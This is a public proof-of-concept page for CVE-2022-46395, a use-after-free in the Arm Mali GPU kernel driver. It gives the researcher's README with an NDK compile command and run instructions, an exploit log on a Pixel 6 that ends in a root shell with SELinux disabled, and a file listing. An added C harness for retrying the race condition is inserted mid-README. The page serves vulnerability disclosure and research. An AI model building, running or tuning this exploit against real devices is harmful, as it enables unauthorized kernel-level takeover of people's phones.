
CVE-2022-46395 PoC — ARM Mali GPU resource-management error vulnerability

Source
Associated Vulnerability
Title: ARM Mali GPU resource-management error vulnerability (CVE-2022-46395)
Description: ARM Mali GPU is a family of mobile graphics processors (GPUs) from the UK company Arm. Like other 3D graphics cores delivered as embedded IP cores, the Mali GPU does not include a display controller that drives an LCD panel directly (as a discrete graphics card would); it is a pure 3D rendering engine that renders images into a buffer, which a separate display core then scans out. ARM Mali GPU has a security vulnerability: an unprivileged user can perform improper GPU processing operations to access memory that has already been freed.
Readme
## Exploit for CVE-2022-46395

The write up can be found [here](https://github.blog/2023-05-25-rooting-with-root-cause-finding-a-variant-of-a-project-zero-bug). This is a bug in the Arm Mali kernel driver that I reported in November 2022. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.

The exploit is tested on the Google Pixel 6 with the November 2022 and January 2023 patches. For reference, I used the following command to compile with clang in ndk-21:

```
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o mali_user_buf
```

The exploit should be run a couple of minutes after boot and is likely to have to run for a few minutes to succeed. It is not uncommon to fail the race condition hundreds of times, although failing the race condition does not have any ill effect and the exploit as a whole rarely crashes. If successful, it should disable SELinux and gain root.
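The retry behaviour described above (hundreds of harmless failures, progress every 100 attempts, a timing calibration refreshed every 300 attempts, as the log below shows) is worth structuring deliberately so a run is bounded by both an attempt count and a wall-clock deadline. The following C harness is an added example, not code from this repository: the real Mali race is replaced by a constructed simulation that "wins" on a chosen attempt number, and the meaning of `benchmark_time` is an assumption (treated here as a caller-supplied calibration the attempt can use to tune its delays; the page does not document what the original measures).

```c
/*
 * Added example (not the repository's code): a bounded retry harness for a
 * race-condition exploit of the kind the README describes.  The attempt
 * callback is supplied by the caller; here a deterministic simulation stands
 * in for the real Mali race.  "benchmark_time" is ASSUMED to be a timing
 * calibration refreshed every 300 attempts, the cadence visible in the log.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* One attempt at winning the race; returns true on success. */
typedef bool (*race_attempt_fn)(void *ctx, uint64_t benchmark);
/* Timing calibration; returns a value the attempt can use to tune delays. */
typedef uint64_t (*benchmark_fn)(void *ctx);

struct race_result {
    bool success;
    unsigned attempts;      /* attempts made, including the winning one */
    unsigned rebenchmarks;  /* calibrations taken, including the initial one */
};

static uint64_t now_ns(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}

/*
 * Retry `attempt` until it succeeds, `max_attempts` is reached, or
 * `timeout_sec` of wall-clock time has elapsed.  Progress is printed every
 * 100 failures and the calibration is refreshed every 300 failures.
 */
struct race_result run_race(race_attempt_fn attempt, benchmark_fn bench, void *ctx,
                            unsigned max_attempts, unsigned timeout_sec)
{
    struct race_result r = { false, 0, 0 };
    uint64_t deadline = now_ns() + (uint64_t)timeout_sec * 1000000000ULL;
    uint64_t benchmark = bench(ctx);
    r.rebenchmarks = 1;
    printf("benchmark_time %llu\n", (unsigned long long)benchmark);

    while (r.attempts < max_attempts && now_ns() < deadline) {
        r.attempts++;
        if (attempt(ctx, benchmark)) {
            r.success = true;
            break;
        }
        if (r.attempts % 100 == 0)
            printf("failed after %u\n", r.attempts);
        if (r.attempts % 300 == 0) {
            benchmark = bench(ctx);
            r.rebenchmarks++;
            printf("benchmark_time %llu\n", (unsigned long long)benchmark);
        }
    }
    return r;
}

/* Constructed simulation: the race is "won" on a chosen attempt number. */
struct sim_ctx {
    unsigned succeed_on;     /* 0 means never succeed */
    unsigned calls;
    uint64_t fake_benchmark; /* stands in for a real timing measurement */
};

static bool sim_attempt(void *p, uint64_t benchmark) {
    struct sim_ctx *s = p;
    (void)benchmark;         /* a real attempt would derive its delays from this */
    s->calls++;
    return s->succeed_on != 0 && s->calls == s->succeed_on;
}

static uint64_t sim_bench(void *p) {
    return ((struct sim_ctx *)p)->fake_benchmark;
}

/* Drive the simulation with one call; 600 s is an arbitrary generous deadline. */
struct race_result run_simulated_race(unsigned succeed_on, unsigned max_attempts) {
    struct sim_ctx s = { succeed_on, 0, 350 };
    return run_race(sim_attempt, sim_bench, &s, max_attempts, 600);
}

int main(void) {
    struct race_result r = run_simulated_race(1337, 100000);
    printf("result %s after %u attempts (%u calibrations)\n",
           r.success ? "ok" : "gave up", r.attempts, r.rebenchmarks);
    return r.success ? 0 : 1;
}
```

A real exploit would pass its own attempt and calibration callbacks; the point of the wrapper is that a run always terminates with a clear outcome instead of spinning indefinitely on a device where the timing never lines up.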

```
oriole:/ $ /data/local/tmp/mali_user_buf                                       
fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
benchmark_time 357
failed after 100
failed after 200
failed after 300
benchmark_time 343
failed after 400
failed after 500
failed after 600
benchmark_time 337
failed after 700
failed after 800
failed after 900
benchmark_time 334
failed after 1000
failed after 1100
failed after 1200
benchmark_time 363
failed after 1300
finished reset: 190027720 fault: 135735849 772 err 0 read 3
found pgd at page 4
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f6100710 710
overwrite addr : 76f5f00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f5d00710 710
overwrite addr : 76f5b00710 710
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f6100fd4 fd4
overwrite addr : 76f5f00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
overwrite addr : 76f5d00fd4 fd4
overwrite addr : 76f5b00fd4 fd4
result 50
oriole:/ # 
```
File Snapshot

```
[4.0K] /data/pocs/4f138f116e558a9a209928b802d3be4f5e106d7c
├── [ 241] log_utils.h
├── [ 50K] mali_base_jm_kernel.h
├── [ 32K] mali.h
├── [ 22K] mali_user_buf.c
├── [1.8K] mempool_utils.c
├── [ 461] mempool_utils.h
├── [5.0K] mem_write.c
├── [ 873] mem_write.h
├── [ 11K] midgard.h
├── [5.2K] offsets.h
└── [2.1K] README.md

0 directories, 11 files
```